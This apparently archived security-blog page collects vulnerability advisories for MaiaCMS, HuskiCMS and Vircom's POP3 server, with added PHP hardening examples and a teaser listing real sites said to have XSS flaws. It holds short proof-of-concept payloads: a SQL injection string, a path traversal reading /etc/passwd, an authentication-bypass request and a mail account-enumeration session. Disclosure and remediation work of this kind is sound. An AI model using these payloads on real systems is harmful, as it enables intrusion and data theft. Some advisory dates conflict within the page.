Results tagged “advisory” from Just Another Hacker

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms; the following are a selection of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages have a check-and-redirect-to-login snippet to validate the login (list_pages.php):
<?php
    require ("../includes/connections.php"); //Includes functions and database connection

    if (empty($is_admin)) {
        header("Location: login.php");
    }   // no exit() after the redirect header
However, it does not halt execution after sending the redirect header, so the rest of the script still runs. This allows the code past the point of redirection to be executed by unauthenticated requests.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the aforementioned access control weakness and allows the session data to be changed or created directly through an HTTP POST operation:
<?php
require_once("../includes/connections.php");

if (empty($is_admin)) {
    header("Location: /admin/login.php");
}   // again no exit(), so the loop below runs regardless

foreach ($_POST as $key => $value) {
    $_SESSION[$key] = $value;   // every POST field becomes a session variable
}

$db->Close();
?>
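A hardened form of the two guards above, as an added example that is not MaiaCMS code; it assumes the admin flag is read from $_SESSION['is_admin'] (the original takes $is_admin from includes/connections.php, which is not shown) and uses a constructed allow-list of session keys (lang, page_size) in place of the unrestricted POST loop.

```php
<?php
// Added example, not MaiaCMS code: hardened versions of the guard in
// admin/list_pages.php and the session update in admin/update_session.php.
declare(strict_types=1);

// Assumption: the admin flag lives in the session (the original takes
// $is_admin from includes/connections.php, whose source is not shown).
function require_admin(array $session, string $login_url = '/admin/login.php'): void
{
    if (!empty($session['is_admin'])) {
        return;
    }
    // The original only sent the Location header; PHP keeps executing after
    // header(), so the protected code still ran. exit is what stops the script.
    header('Location: ' . $login_url, true, 302);
    exit;
}

// Allow-list of session keys a POST may set, with a pattern each value must
// match (constructed for the example; MaiaCMS's real keys are not shown).
const SESSION_KEY_RULES = [
    'lang'      => '/^[a-z]{2}$/',
    'page_size' => '/^[1-9][0-9]{0,2}$/',
];

// Replaces the original "foreach ($_POST ...) $_SESSION[$key] = $value;",
// which let a POST create or overwrite any session variable.
// Returns the rejected keys so the caller can log them.
function update_session_from_post(array $post, array &$session): array
{
    $rejected = [];
    foreach ($post as $key => $value) {
        $key = (string) $key;
        if (!isset(SESSION_KEY_RULES[$key]) || !is_string($value)
            || preg_match(SESSION_KEY_RULES[$key], $value) !== 1) {
            $rejected[] = $key;
            continue;
        }
        $session[$key] = $value;
    }
    return $rejected;
}

session_start();
require_admin($_SESSION);
$rejected = update_session_from_post($_POST, $_SESSION);
if ($rejected !== []) {
    error_log('update_session: rejected keys ' . implode(',', $rejected));
}
```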

--- Solution ---
Wait for the next (non-alpha) release.

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS.
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/db_mysql.inc";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";


    // Quicksite Core Includes
    include_once "Quicksite/Core/all.inc.php";
    
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    print_r($_SESSION['login']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    $page->loadPluginSources();
   
    // Create the Page
    $page->createPage();
   
    echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledges vulnerability
28-Jan-2010 - Vendor notified through email
 

Pack of XSS

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately, even though XSS is old news in the security community and there are well established techniques to mitigate the attack, it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

Advisories

These are the vulnerabilities published by justanotherhacker.com.

Site specific vulnerabilities are reported at

Advisory   Date       Subject                                                Media
JAHx103    20100205   Multiple vulnerabilities in maiacms                    .txt
JAHx102    20100205   HuskiCMS local file inclusion                          .txt
JAHx101    20100205   Huski retail multiple SQL injection vulnerabilities    .txt
JAHx091    20091106   Vircom vopmail / modusmail information disclosure      .txt
--------------------------------------------------------------------------------------------
20091106 - Justanotherhacker.com : Vircom vopmail / modusmail information disclosure
JAHx091 - http://www.justanotherhacker.com/advisories/JAHx091.txt
--------------------------------------------------------------------------------------------

modusMail
All in one email security solution

The modusMail™ mail server provides all-in-one email services, messaging security and spam protection.
[ Taken from: http://www.vircom.com/en/products/modusmail/ ]


--- Vulnerability description ---
A conditional information disclosure exists in older versions of modusMail and Vopmail that reveals whether an email account exists or not. The disclosure is conditional upon the presence of an @ or % character in the username; this form of username is usually used when one mail system is responsible for the email of several domains. If the @ or % character is not present in the username, the POP3 server requests a password before rejecting the login, whereas with the character present it aborts the login attempt immediately after receiving the user portion of the login. The difference in the USER reply is what discloses the account's existence.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Information disclosure
Severity: Low
Release: Responsible
CVE: None
Vendor: Vircom - http://www.vircom.com
Affected versions:
Modus mail <= 4.4.491
Probably all versions of Vopmail


--- Proof of Concept ---
~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready <37819600.1156428713.245@vircom.com>
user nosuchuserhere
+OK nosuchuserhere is welcome here
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.

~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready <36899224.1156429893.504@vircom.com>
user nosuchuser@nosuchhost.com
-ERR nosuchuser@nosuchhost.com not known
user nosuchuser%nosuchhost.com
-ERR nosuchuser%nosuchhost.com not known
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.
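A minimal model of the USER/PASS handling described above, as an added example that is not Vircom code: the reported behaviour is placed beside the uniform-response fix, together with the check a server operator can run to confirm the USER reply no longer depends on account existence. The account list and mailbox names are constructed for the example.

```php
<?php
// Added example, not Vircom code: models the POP3 USER/PASS behaviour the
// advisory describes, beside the uniform-response fix.
declare(strict_types=1);

// Constructed sample of hosted mailboxes (a real server would store hashes).
const ACCOUNTS = ['alice@example.com' => 'secret1', 'bob@example.com' => 'secret2'];

function account_key(string $user): string
{
    return str_replace('%', '@', $user);   // "user%domain" looks up "user@domain"
}

// Reported behaviour: a USER name containing @ or % that matches no hosted
// mailbox is rejected immediately; any other name is accepted until PASS.
// The different replies are the account-existence oracle.
function user_reply_reported(string $user): string
{
    if (preg_match('/[@%]/', $user) === 1 && !isset(ACCOUNTS[account_key($user)])) {
        return "-ERR $user not known";
    }
    return "+OK $user is welcome here";
}

// Fix: USER always gets the same reply; existence is checked only together
// with the password at PASS, and both failure cases get the same error.
function user_reply_fixed(string $user): string
{
    return "+OK $user is welcome here";
}

function pass_reply(string $user, string $pass): string
{
    $key = account_key($user);
    $ok = isset(ACCOUNTS[$key]) && hash_equals(ACCOUNTS[$key], $pass);
    return $ok ? '+OK mailbox locked and ready' : '-ERR authentication failed';
}

// Check an operator can run against a handler: the status word of the USER
// reply must be the same for a hosted mailbox and for an unknown one.
function leaks_existence(callable $user_reply): bool
{
    $status = fn(string $reply): string => explode(' ', $reply, 2)[0];
    return $status($user_reply('alice@example.com'))
        !== $status($user_reply('nosuchuser@example.com'));
}

var_dump(leaks_existence('user_reply_reported'), leaks_existence('user_reply_fixed'));
var_dump(pass_reply('nosuchuser@example.com', 'x') === pass_reply('alice@example.com', 'wrong'));
```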



--- Solution ---
Upgrade to a more recent version


--- Disclosure time line ---
06-Nov-2009 - Public disclosure
15-Sep-2006 - New version of modusMail mitigates this
26-Aug-2009 - Vendor acknowledges problem
19-Aug-2006 - Vendor notified through email

Old advisory

It's that time of the year, and this Christmas we're all giving away old bugs.
So here is an advisory that never made it, until now.

Vircom vopmail / modusmail information disclosure

This weblog is licensed under a Creative Commons License.